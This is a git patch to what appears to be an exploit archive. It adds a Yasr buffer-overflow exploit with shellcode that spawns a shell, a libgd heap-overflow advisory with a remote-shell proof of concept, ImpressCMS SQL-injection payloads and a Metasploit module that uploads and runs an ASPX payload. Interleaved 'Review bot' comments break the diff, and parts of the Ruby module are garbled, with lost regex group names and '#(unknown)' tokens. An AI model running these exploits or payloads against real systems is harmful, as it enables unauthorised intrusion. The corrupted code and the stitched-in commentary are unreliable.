From fe5081847ef1aec1f127833853786203edf4941a Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 27 Apr 2016 05:02:48 +0000
Subject: [PATCH] DB: 2016-04-27

4 new exploits

Yasr Screen Reader 0.6.9 - Local Buffer Overflow
Advantech WebAccess Dashboard Viewer Arbitrary File Upload
libgd 2.1.1 - Signedness Heap Overflow
ImpressCMS 1.3.9 - SQL Injection
---
 files.csv | 4 +
 platforms/linux/local/39734.py | 66 ++++++++
 platforms/linux/remote/39736.txt | 241 ++++++++++++++++++++++++++++++
 platforms/php/webapps/39737.txt | 84 +++++++++++
 platforms/windows/remote/39735.rb | 130 ++++++++++++++++
 5 files changed, 525 insertions(+)
 create mode 100755 platforms/linux/local/39734.py
 create mode 100755 platforms/linux/remote/39736.txt
 create mode 100755 platforms/php/webapps/39737.txt
 create mode 100755 platforms/windows/remote/39735.rb

diff --git a/files.csv b/files.csv
index 57a0e2148..42beed26c 100755
--- a/files.csv
+++ b/files.csv
@@ -35945,3 +35945,7 @@ id,file,description,date,author,platform,type,port
 39729,platforms/win32/remote/39729.rb,"PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow (MSF)",2016-04-25,"Jonathan Smith",win32,remote,21
 39730,platforms/ruby/webapps/39730.txt,"NationBuilder Multiple Stored XSS Vulnerabilities",2016-04-25,LiquidWorm,ruby,webapps,443
 39733,platforms/linux/dos/39733.py,"Rough Auditing Tool for Security (RATS) 2.3 - Crash PoC",2016-04-25,"David Silveiro",linux,dos,0
+39734,platforms/linux/local/39734.py,"Yasr Screen Reader 0.6.9 - Local Buffer Overflow",2016-04-26,"Juan Sacco",linux,local,0
+39735,platforms/windows/remote/39735.rb,"Advantech WebAccess Dashboard Viewer Arbitrary File Upload",2016-04-26,metasploit,windows,remote,80
+39736,platforms/linux/remote/39736.txt,"libgd 2.1.1 - Signedness Heap Overflow",2016-04-26,"Hans Jerry Illikainen",linux,remote,0
+39737,platforms/php/webapps/39737.txt,"ImpressCMS 1.3.9 - SQL Injection",2016-04-26,"Manuel García Cárdenas",php,webapps,80
diff --git a/platforms/linux/local/39734.py b/platforms/linux/local/39734.py
new file mode 100755
index 000000000..1a38802ea
--- /dev/null
+++ b/platforms/linux/local/39734.py
@@ -0,0 +1,66 @@
+'''
+# Exploit Author: Juan Sacco - http://www.exploitpack.com - jsacco@exploitpack.com
+# Program affected: General-purpose console screen reader
+# Version: 0.6.9-5
+#
+# Tested and developed under: Kali Linux 2.0 x86 - https://www.kali.org
+# Program description: Yasr is a general-purpose console screen reader
+for GNU/Linux and other Unix-like operating systems.
+# Kali Linux 2.0 package: pool/main/y/yasr/yasr_0.6.9-5_i386.deb
+# MD5sum: 910f4b41fd09d5486b935097dc8dd2f8
+# Website: http://yasr.sourceforge.net/
+#
+#
+# Starting program: /usr/bin/yasr -p $(python -c 'print "\x90"*258')
+# [Thread debugging using libthread_db enabled]
+# Using host libthread_db library
+"/lib/i386-linux-gnu/i686/cmov/libthread_db.so.1".
+# Program received signal SIGSEGV, Segmentation fault.
+#
+# 0x90909090 in ?? ()
+#
+#gdb$ backtrace
+#0 0xb7fdebe0 in __kernel_vsyscall ()
+#1 0xb7e33367 in __GI_raise (sig=sig@entry=0x6) at
+../nptl/sysdeps/unix/sysv/linux/raise.c:56
+#2 0xb7e34a23 in __GI_abort () at abort.c:89
+#3 0xb7e71778 in __libc_message (do_abort=do_abort@entry=0x2,
+fmt=fmt@entry=0xb7f67715 "*** %s ***: %s terminated\n") at
+../sysdeps/posix/libc_fatal.c:175
+#4 0xb7f01b85 in __GI___fortify_fail (msg=msg@entry=0xb7f67696
+"buffer overflow detected") at fortify_fail.c:31
+#5 0xb7effc3a in __GI___chk_fail () at chk_fail.c:28
+'''
+
+import os, subprocess
+
+def run():
+ try:
+ print "# Yasr Console Screen Reader - Buffer Overflow by Juan Sacco"
+ print "# This exploit is for educational purposes only"
+ # JUNK + SHELLCODE + NOPS + EIP
+
+ junk = "\x41"*298
+ shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
+ nops = "\x90"*12
+ eip = "\xd2\xf3\xff\xbf"
+ subprocess.call(["yasr ",'-p ', junk + shellcode + nops + eip])
+
+ except OSError as e:
+ if e.errno == os.errno.ENOENT:
+ print "Sorry, Yasr Console Reader - Not found!"
+ else:
+ print "Error executing exploit"
+ raise
+
+def howtousage():
+ print "Snap! Something went wrong"
+ sys.exit(-1)
+
+if __name__ == '__main__':
+ try:
+ print "Exploit Yasr 0.6.9-5 Local Overflow Exploit"
+ print "Author: Juan Sacco"
+ except IndexError:
+ howtousage()
+run()
diff --git a/platforms/linux/remote/39736.txt b/platforms/linux/remote/39736.txt
new file mode 100755
index 000000000..97d6b5b1c
--- /dev/null
+++ b/platforms/linux/remote/39736.txt
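Review bot: The `try … except IndexError: howtousage()` under the `__main__` guard wraps two `print` statements that cannot raise `IndexError`, so the handler is dead code, and `howtousage` itself calls `sys.exit(-1)` while only `os` and `subprocess` are imported, so reaching it would raise `NameError` instead of exiting. `os.errno` in the `except OSError` branch is not part of the public `os` interface (it was removed in Python 3.7); the portable spelling is `import errno` at the top and `if e.errno == errno.ENOENT:`. `run()` on the last line is at column 0, outside the `if __name__ == '__main__':` block, so it executes on import as well as when the file is run as a script; indent it under the guard if that is the intent.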
@@ -0,0 +1,241 @@
+Overview
+========
+
+libgd [1] is an open-source image library. It is perhaps primarily used
+by the PHP project. It has been bundled with the default installation
+of PHP since version 4.3 [2].
+
+A signedness vulnerability (CVE-2016-3074) exist in libgd 2.1.1 which
+may result in a heap overflow when processing compressed gd2 data.
+
+
+Details
+=======
+
+4 bytes representing the chunk index size is stored in a signed integer,
+chunkIdx[i].size, by `gdGetInt()' during the parsing of GD2 headers:
+
+libgd-2.1.1/src/gd_gd2.c:
+,----
+| 53 typedef struct {
+| 54 int offset;
+| 55 int size;
+| 56 }
+| 57 t_chunk_info;
+`----
+
+
+libgd-2.1.1/src/gd_gd2.c:
+,----
+| 65 static int
+| 66 _gd2GetHeader (gdIOCtxPtr in, int *sx, int *sy,
+| 67 int *cs, int *vers, int *fmt, int *ncx, int *ncy,
+| 68 t_chunk_info ** chunkIdx)
+| 69 {
+| ...
+| 73 t_chunk_info *cidx;
+| ...
+| 155 if (gd2_compressed (*fmt)) {
+| ...
+| 163 for (i = 0; i < nc; i++) {
+| ...
+| 167 if (gdGetInt (&cidx[i].size, in) != 1) {
+| 168 goto fail2;
+| 169 };
+| 170 };
+| 171 *chunkIdx = cidx;
+| 172 };
+| ...
+| 181 }
+`----
+
+
+`gdImageCreateFromGd2Ctx()' and `gdImageCreateFromGd2PartCtx()' then
+allocates memory for the compressed data based on the value of the
+largest chunk size:
+
+libgd-2.1.1/src/gd_gd2.c:
+,----
+| 371|637 if (gd2_compressed (fmt)) {
+| 372|638 /* Find the maximum compressed chunk size. */
+| 373|639 compMax = 0;
+| 374|640 for (i = 0; (i < nc); i++) {
+| 375|641 if (chunkIdx[i].size > compMax) {
+| 376|642 compMax = chunkIdx[i].size;
+| 377|643 };
+| 378|644 };
+| 379|645 compMax++;
+| ...|...
+| 387|656 compBuf = gdCalloc (compMax, 1);
+| ...|...
+| 393|661 };
+`----
+
+
+A size of <= 0 results in `compMax' retaining its initial value during
+the loop, followed by it being incremented to 1. Since `compMax' is
+used as the nmemb for `gdCalloc()', this leads to a 1*1 byte allocation
+for `compBuf'.
+
+This is followed by compressed data being read to `compBuf' based on the
+current (potentially negative) chunk size:
+
+libgd-2.1.1/src/gd_gd2.c:
+,----
+| 339 BGD_DECLARE(gdImagePtr) gdImageCreateFromGd2Ctx (gdIOCtxPtr in)
+| 340 {
+| ...
+| 413 if (gd2_compressed (fmt)) {
+| 414
+| 415 chunkLen = chunkMax;
+| 416
+| 417 if (!_gd2ReadChunk (chunkIdx[chunkNum].offset,
+| 418 compBuf,
+| 419 chunkIdx[chunkNum].size,
+| 420 (char *) chunkBuf, &chunkLen, in)) {
+| 421 GD2_DBG (printf ("Error reading comproessed chunk\n"));
+| 422 goto fail;
+| 423 };
+| 424
+| 425 chunkPos = 0;
+| 426 };
+| ...
+| 501 }
+`----
+
+
+libgd-2.1.1/src/gd_gd2.c:
+,----
+| 585 BGD_DECLARE(gdImagePtr) gdImageCreateFromGd2PartCtx (gdIOCtx * in, int srcx, int srcy, int w, int h)
+| 586 {
+| ...
+| 713 if (!gd2_compressed (fmt)) {
+| ...
+| 731 } else {
+| 732 chunkNum = cx + cy * ncx;
+| 733
+| 734 chunkLen = chunkMax;
+| 735 if (!_gd2ReadChunk (chunkIdx[chunkNum].offset,
+| 736 compBuf,
+| 737 chunkIdx[chunkNum].size,
+| 738 (char *) chunkBuf, &chunkLen, in)) {
+| 739 printf ("Error reading comproessed chunk\n");
+| 740 goto fail2;
+| 741 };
+| ...
+| 746 };
+| ...
+| 815 }
+`----
+
+
+The size is subsequently interpreted as a size_t by `fread()' or
+`memcpy()', depending on how the image is read:
+
+libgd-2.1.1/src/gd_gd2.c:
+,----
+| 221 static int
+| 222 _gd2ReadChunk (int offset, char *compBuf, int compSize, char *chunkBuf,
+| 223 uLongf * chunkLen, gdIOCtx * in)
+| 224 {
+| ...
+| 236 if (gdGetBuf (compBuf, compSize, in) != compSize) {
+| 237 return FALSE;
+| 238 };
+| ...
+| 251 }
+`----
+
+libgd-2.1.1/src/gd_io.c:
+,----
+| 211 int gdGetBuf(void *buf, int size, gdIOCtx *ctx)
+| 212 {
+| 213 return (ctx->getBuf)(ctx, buf, size);
+| 214 }
+`----
+
+
+For file contexts:
+
+libgd-2.1.1/src/gd_io_file.c:
+,----
+| 52 BGD_DECLARE(gdIOCtx *) gdNewFileCtx(FILE *f)
+| 53 {
+| ...
+| 67 ctx->ctx.getBuf = fileGetbuf;
+| ...
+| 76 }
+| ...
+| 92 static int fileGetbuf(gdIOCtx *ctx, void *buf, int size)
+| 93 {
+| 94 fileIOCtx *fctx;
+| 95 fctx = (fileIOCtx *)ctx;
+| 96
+| 97 return (fread(buf, 1, size, fctx->f));
+| 98 }
+`----
+
+
+And for dynamic contexts:
+
+libgd-2.1.1/src/gd_io_dp.c:
+,----
+| 74 BGD_DECLARE(gdIOCtx *) gdNewDynamicCtxEx(int initialSize, void *data, int freeOKFlag)
+| 75 {
+| ...
+| 95 ctx->ctx.getBuf = dynamicGetbuf;
+| ...
+| 104 }
+| ...
+| 256 static int dynamicGetbuf(gdIOCtxPtr ctx, void *buf, int len)
+| 257 {
+| ...
+| 280 memcpy(buf, (void *) ((char *)dp->data + dp->pos), rlen);
+| ...
+| 284 }
+`----
+
+
+PoC
+===
+
+Against Ubuntu 15.10 amd64 running nginx with php5-fpm and php5-gd [3]:
+
+,----
+| $ python exploit.py --bind-port 5555 http://1.2.3.4/upload.php
+| [*] this may take a while
+| [*] offset 912 of 10000...
+| [+] connected to 1.2.3.4:5555
+| id
+| uid=33(www-data) gid=33(www-data) groups=33(www-data)
+|
+| uname -a
+| Linux wily64 4.2.0-35-generic #40-Ubuntu SMP Tue Mar 15 22:15:45 UTC
+| 2016 x86_64 x86_64 x86_64 GNU/Linux
+|
+| dpkg -l|grep -E "php5-(fpm|gd)"
+| ii php5-fpm 5.6.11+dfsg-1ubuntu3.1 ...
+| ii php5-gd 5.6.11+dfsg-1ubuntu3.1 ...
+|
+| cat upload.php
+|
+`----
+
+
+Solution
+========
+
+This bug has been fixed in git HEAD [4].
+
+Full Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39736.zip
+
+Footnotes
+_________
+
+[1] [http://libgd.org/]
+[2] [https://en.wikipedia.org/wiki/Libgd]
+[3] [https://github.com/dyntopia/exploits/tree/master/CVE-2016-3074]
+[4] [https://github.com/libgd/libgd/commit/2bb97f407c1145c850416a3bfbcc8cf124e68a19]
diff --git a/platforms/php/webapps/39737.txt b/platforms/php/webapps/39737.txt
new file mode 100755
index 000000000..0c8f4a86b
--- /dev/null
+++ b/platforms/php/webapps/39737.txt
@@ -0,0 +1,84 @@
+=============================================
+MGC ALERT 2016-002
+- Original release date: April 8, 2016
+- Last revised: April 21, 2016
+- Discovered by: Manuel García Cárdenas
+- Severity: 7,1/10 (CVSS Base Score)
+=============================================
+
+I. VULNERABILITY
+-------------------------
+Time-based SQL Injection in Admin panel ImpressCMS <= v1.3.9
+
+II. BACKGROUND
+-------------------------
+ImpressCMS is a community developed Content Management System for easily
+building and maintaining a dynamic web site.
+
+III. DESCRIPTION
+-------------------------
+This bug was found using the portal with authentication as administrator.
+To exploit the vulnerability only is needed use the version 1.0 of the HTTP
+protocol to interact with the application.
+
+It is possible to inject SQL code in the variable
+"quicksearch_mod_profile_Field" on the page
+"/modules/profile/admin/field.php".
+
+IV. PROOF OF CONCEPT
+-------------------------
+The following URL's and parameters have been confirmed to all suffer from
+Time Based Blind SQL injection.
+
+quicksearch_mod_profile_Field=aaaa') AND (SELECT * FROM
+(SELECT(SLEEP(1)))IRLV) AND ('DhUh' LIKE
+'DhUh&button_quicksearch_mod_profile_Field=Search&filtersel=default&limitsel=15
+
+quicksearch_mod_profile_Field=aaaa') AND (SELECT * FROM
+(SELECT(SLEEP(5)))IRLV) AND ('DhUh' LIKE
+'DhUh&button_quicksearch_mod_profile_Field=Search&filtersel=default&limitsel=15
+
+V. BUSINESS IMPACT
+-------------------------
+Public defacement, confidential data leakage, and database server
+compromise can result from these attacks. Client systems can also be
+targeted, and complete compromise of these client systems is also possible.
+
+VI. SYSTEMS AFFECTED
+-------------------------
+ImpressCMS <= v1.3.9
+
+VII. SOLUTION
+-------------------------
+Install vendor patch.
+
+VIII. REFERENCES
+-------------------------
+http://www.impresscms.org/
+
+IX. CREDITS
+-------------------------
+This vulnerability has been discovered and reported
+by Manuel García Cárdenas (advidsec (at) gmail (dot) com).
+
+X. REVISION HISTORY
+-------------------------
+April 8, 2016 1: Initial release
+April 21, 2016 2: Revision to send to lists
+
+XI. DISCLOSURE TIMELINE
+-------------------------
+April 8, 2016 1: Vulnerability acquired by Manuel Garcia Cardenas
+April 8, 2016 2: Send to vendor
+April 15, 2016 3: New contact to vendor with no response
+April 21, 2016 4: Send to the Full-Disclosure lists
+
+XII. LEGAL NOTICES
+-------------------------
+The information contained within this advisory is supplied "as-is" with no
+warranties or guarantees of fitness of use or otherwise.
+
+XIII. ABOUT
+-------------------------
+Manuel Garcia Cardenas
+Pentester
diff --git a/platforms/windows/remote/39735.rb b/platforms/windows/remote/39735.rb
new file mode 100755
index 000000000..1359d1bc3
--- /dev/null
+++ b/platforms/windows/remote/39735.rb
@@ -0,0 +1,130 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::EXE
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => "Advantech WebAccess Dashboard Viewer Arbitrary File Upload",
+ 'Description' => %q{
+ This module exploits an arbitrary file upload vulnerability found in Advantech WebAccess 8.0.
+
+ This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations
+ of Advantech WebAccess. Authentication is not required to exploit this vulnerability.
+
+ The specific flaw exists within the WebAccess Dashboard Viewer. Insufficient validation within
+ the uploadImageCommon function in the UploadAjaxAction script allows unauthenticated callers to
+ upload arbitrary code (instead of an image) to the server, which will then be executed under the
+ high-privilege context of the IIS AppPool.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [
+ 'rgod', # Vulnerability discovery
+ 'Zhou Yu <504137480[at]qq.com>' # MSF module
+ ],
+ 'References' => [
+ [ 'CVE', '2016-0854' ],
+ [ 'ZDI', '16-128' ],
+ [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01']
+ ],
+ 'Platform' => 'win',
+ 'Targets' => [
+ ['Advantech WebAccess 8.0', {}]
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => "Feb 5 2016",
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ Opt::RPORT(80),
+ OptString.new('TARGETURI', [true, 'The base path of Advantech WebAccess 8.0', '/'])
+ ], self.class)
+ end
+
+ def version_match(data)
+ # Software Build : 8.0-2015.08.15
+ fingerprint = data.match(/Software\sBuild\s:\s(?\d{1,2}\.\d{1,2})-(?\d{4})\.(?\d{1,2})\.(?\d{1,2})/)
+ fingerprint['version'] unless fingerprint.nil?
+ end
+
+ def vuln_version?
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => target_uri.to_s
+ )
+
+ if res.redirect?
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => normalize_uri(res.redirection)
+ )
+ end
+
+ ver = res && res.body ? version_match(res.body) : nil
+ true ? Gem::Version.new(ver) == Gem::Version.new('8.0') : false
+ end
+
+ def check
+ if vuln_version?
+ Exploit::CheckCode::Appears
+ else
+ Exploit::CheckCode::Safe
+ end
+ end
+
+ def upload_file?(filename, file)
+ uri = normalize_uri(target_uri, 'WADashboard', 'ajax', 'UploadAjaxAction.aspx')
+
+ data = Rex::MIME::Message.new
+ data.add_part('uploadFile', nil, nil, 'form-data; name="actionName"')
+ data.add_part(file, nil, nil, "form-data; name=\"file\"; filename=\"#(unknown)\"")
+
+ res = send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => uri,
+ 'cookie' => "waUserName=admin",
+ 'ctype' => "multipart/form-data; boundary=#{data.bound}",
+ 'data' => data.to_s
+ )
+ true ? res && res.code == 200 && res.body.include?("{\"resStatus\":\"0\",\"resString\":\"\/#(unknown)\"}") : false
+ end
+
+ def exec_file?(filename)
+ uri = normalize_uri(target_uri)
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => uri
+ )
+
+ uri = normalize_uri(target_uri, 'WADashboard', filename)
+ res = send_request_cgi(
+ 'method' => 'GET',
+ 'uri' => uri,
+ 'cookie' => res.get_cookies
+ )
+ true ? res && res.code == 200 : false
+ end
+
+ def exploit
+ unless vuln_version?
+ print_status("#{peer} - Cannot reliably check exploitability.")
+ return
+ end
+ filename = "#{Rex::Text.rand_text_alpha(5)}.aspx"
+ filedata = Msf::Util::EXE.to_exe_aspx(generate_payload_exe)
+
+ print_status("#{peer} - Uploading malicious file...")
+ return unless upload_file?(filename, filedata)
+
+ print_status("#{peer} - Executing #(unknown)...")
+ return unless exec_file?(filename)
+ end
+end
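Review bot: The `true ? … : false` form closing `vuln_version?`, `upload_file?` and `exec_file?` has the literal `true` as its condition, so the ternary always yields its middle operand and adds nothing; `Gem::Version.new(ver) == Gem::Version.new('8.0')` and the two `res && res.code == 200 …` expressions can stand on their own, or take the idiomatic `expr ? true : false` if a strict boolean is intended. The regexp in `version_match` reads `(?\d{1,2}\.\d{1,2})` for each group, which is not valid Ruby group syntax; since the method indexes `fingerprint['version']`, the group names were presumably lost in rendering, and the `#(unknown)` tokens in the multipart filename, the response check and the "Executing" log line look like the same kind of lost interpolation, so this copy should be checked against the upstream module before it is relied on. A short comment above `version_match`, e.g. `# Returns the major.minor build string parsed from the landing page, or nil when no build banner is present`, would also make the nil path that `vuln_version?` depends on explicit.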